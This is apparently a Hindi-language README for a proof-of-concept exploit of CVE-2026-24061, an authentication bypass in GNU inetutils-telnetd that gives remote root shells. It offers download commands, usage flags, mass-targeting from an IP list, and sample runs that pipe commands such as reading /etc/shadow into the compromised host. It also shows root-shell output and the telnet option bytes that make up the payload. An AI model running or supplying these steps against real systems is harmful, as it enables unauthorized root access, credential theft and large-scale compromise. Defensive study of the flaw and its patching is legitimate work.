
प्रूफ ऑफ कॉन्सेप्ट: CVE-2026-24061 GNU inetutils-telnetd में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो अनधिकृत दूरस्थ हमलावरों को दुर्भावनापूर्ण NEW_ENVIRON टेलनेट विकल्प शोषण के माध्यम से तुरंत रूट शेल एक्सेस प्राप्त करने की अनुमति देता है।
CVE-2026-24061 का शोषण करने के लिए एक सुरक्षा अनुसंधान उपकरण, जो GNU inetutils-telnetd में एक गंभीर दूरस्थ प्रमाणीकरण बाईपास भेद्यता है, जो बिना प्रमाणीकरण के तत्काल रूट शेल एक्सेस की अनुमति देता है।
| फ़ील्ड | मान |
|---|---|
| CVE पहचानकर्ता | CVE-2026-24061 |
| CVSS v3.1 स्कोर | 9.8 (गंभीर) |
| CVSS वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE वर्गीकरण | CWE-88: कमांड में तर्क सीमांकक का अनुचित निष्प्रभावीकरण |
| विक्रेता | GNU परियोजना |
| उत्पाद | inetutils-telnetd |
| प्रकटीकरण तिथि | 20 जनवरी, 2026 |
| पैच उपलब्ध | निर्धारित किया जाना है (TBD) |
GNU inetutils-telnetd में संस्करण 2.7 तक एक गंभीर भेद्यता मौजूद है जो अप्रमाणित दूरस्थ हमलावरों को प्रमाणीकरण को पूरी तरह से बायपास करने और तत्काल रूट शेल एक्सेस प्राप्त करने की अनुमति देती है। इस भेद्यता का शोषण NEW_ENVIRON टेलनेट विकल्प के माध्यम से एक विशेष रूप से तैयार USER पर्यावरण चर को मान "-f root" के साथ इंजेक्ट करके किया जाता है, जो सभी प्रमाणीकरण तंत्रों को बायपास कर देता है।
| संस्करण श्रेणी | स्थिति |
|---|---|
| <= 2.7 | कमजोर |
| > 2.7 | पैच स्थिति निर्धारित की जानी है (TBD) |
यह भेद्यता telnetd के NEW_ENVIRON विकल्प हैंडलर में USER पर्यावरण चर के अनुचित सत्यापन से उत्पन्न होती है। NEW_ENVIRON टेलनेट विकल्प को संसाधित करते समय, telnetd सेवा USER चर मान को लॉगिन प्रक्रिया में भेजने से पहले सैनिटाइज करने में विफल रहती है। USER को "-f root" पर सेट करके, हमलावर कमांड-लाइन तर्क इंजेक्ट करता है जो बिना क्रेडेंशियल्स के रूट उपयोगकर्ता के लिए प्रमाणीकरण को सफल करने के लिए मजबूर करता है।
सभी निर्भरताएँ Python की मानक लाइब्रेरी का हिस्सा हैं:
| पैकेज | उद्देश्य |
|---|---|
| socket | नेटवर्क संचार |
| select | I/O मल्टीप्लेक्सिंग |
| sys | सिस्टम इंटरैक्शन |
| os | ऑपरेटिंग सिस्टम इंटरफ़ेस |
| threading | समवर्ती लक्ष्य शोषण |
| datetime | टाइमस्टैम्प फ़ॉर्मेटिंग |
# रिपॉजिटरी क्लोन करें
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061
# शोषण चलाएँ
python3 main.py -u <target_ip>
# शोषण डाउनलोड करें
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py
# इसे निष्पादन योग्य बनाएँ (Linux/macOS)
chmod +x main.py
# शोषण चलाएँ
python3 main.py -u <target_ip>
# सुनिश्चित करें कि Python 3.7+ स्थापित है
python3 --version
# डाउनलोड करें और चलाएँ
python3 main.py -u <target_ip>
Usage:
python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
echo "commands" | python3 main.py -u <target_ip>
Arguments:
-u एकल लक्ष्य IP पता या होस्टनाम
-l लक्ष्य IP वाली फ़ाइल का पथ (प्रति पंक्ति एक)
-p लक्ष्य पोर्ट (डिफ़ॉल्ट: 23)
-usr शोषण के लिए उपयोगकर्ता (डिफ़ॉल्ट: root)
एकल telnetd इंस्टेंस का शोषण करें:
# मूल शोषण (डिफ़ॉल्ट पोर्ट 23, उपयोगकर्ता root)
python3 main.py -u 192.168.1.100
# कस्टम पोर्ट
python3 main.py -u 192.168.1.100 -p 2323
# भिन्न उपयोगकर्ता
python3 main.py -u 192.168.1.100 -usr admin
गैर-इंटरैक्टिव रूप से कमांड निष्पादित करें:
# एकल कमांड
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100
# एकाधिक कमांड
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100
# आउटपुट रीडायरेक्शन के साथ कमांड
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100
फ़ाइल से एकाधिक लक्ष्यों का शोषण करें:
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin
लक्ष्य फ़ाइल प्रारूप (targets.txt):
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com
नोट्स:
| संकेतक | रंग | विवरण |
|---|---|---|
[SUCCESS] | हरा | लक्ष्य से सफलतापूर्वक जुड़ा |
[EXPLOIT] | हरा | शोषण पेलोड सफलतापूर्वक भेजा गया |
[INFO] | नीला | वर्तमान ऑपरेशन के बारे में सूचनात्मक संदेश |
[ERROR] | लाल | कनेक्शन विफलता, टाइमआउट, या शोषण त्रुटि |
[WARNING] | पीला | चेतावनी संदेश (वर्तमान में उपयोग नहीं किया गया) |
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass ║
║ ║
║ CVSS Score: 9.8 (Critical) ║
║ Impact: Remote Authentication Bypass - Instant Root Shell ║
║ ║
║ This tool is part of the HGrab Framework. ║
╚═══════════════════════════════════════════════════════════════╝
[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
शोषण टेलनेट प्रोटोकॉल वार्ता चरण का लाभ उठाता है:
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39